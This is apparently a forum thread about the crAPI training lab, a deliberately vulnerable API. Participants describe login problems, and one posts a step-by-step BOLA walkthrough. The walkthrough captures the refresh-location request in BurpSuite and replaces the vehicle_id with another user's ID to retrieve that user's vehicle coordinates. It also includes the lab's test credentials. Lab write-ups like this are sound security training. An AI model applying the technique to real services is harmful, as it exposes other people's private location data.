On task3, I went and reset the lab multiple times (lab restart), and noticed that ever so often I login once with test user and if I log out or try to login with firefox for example, I get the similar behaviour as unable to login like you.
I’ve since reset the lab, and able to get vehicle endpoints, but not able to manipulate the vehicle id on two different endpoints for the target of exploitation (TOE).
if you get to task3 and can provide pointers, I’m sure they would be greatly appreciated for the learning experience
went to next lab, not working right so went back to this one, it just hit me they said (Notice that it uses a vehicle ID?) once you get your lab back read through it again and look at what you found previously.
hmmm…I know that we were looking for the vehicleid/carid, but the problem was that I was able to log in as user@example.com, but when I was was probing around like in the “refresh location”, I don’t know what was causing my repeated http request to cause 502 errors and if I tried to refresh the page for it to require to re login, but would not be able to as I would get the “Invalid Username or Password”. I wish and should have taken better notes on the behavior…but once I was able to grag the trophy latitude/longitude, I moved on.
This is what I think I did to get my trophies:
Login with the Test Account:
• Log in to crAPI using the test credentials:
Email: test@example.com
Password: Test!123
• Capture the login request and response in BurpSuite. You’ll need the JWT token later for authenticated requests.
Locate Your Own Vehicle’s Coordinates:
• Once logged in, navigate to the Vehicle Details page in the crAPI application (this is usually accessible from the dashboard).
• You’ll find a “Refresh Location” button on the Vehicle Details page. Click this button and capture the request in BurpSuite.
Capture the Vehicle Location API Request:
• In BurpSuite, look for the API request sent when the “Refresh Location” button is clicked.
• Note the vehicle_id used in the request. This ID corresponds to your own vehicle.
Exploit the BOLA Vulnerability:
• To exploit BOLA, replace your vehicle’s ID in the API request with the vehicle_id of another user, such as Adam007. In previous exercises, you captured email addresses from the Community page, which may also include associated vehicle_id fields.
• Modify the request in BurpSuite Repeater or directly through Intercept.
• Replace {adam007_vehicle_id} with the vehicle ID you captured for Adam007 (or another community user).
Send the Modified Request:
• With BurpSuite, send the modified request. Since the server is not properly checking if you’re authorized to access the vehicle_id of another user, it should return the location coordinates for Adam007’s vehicle.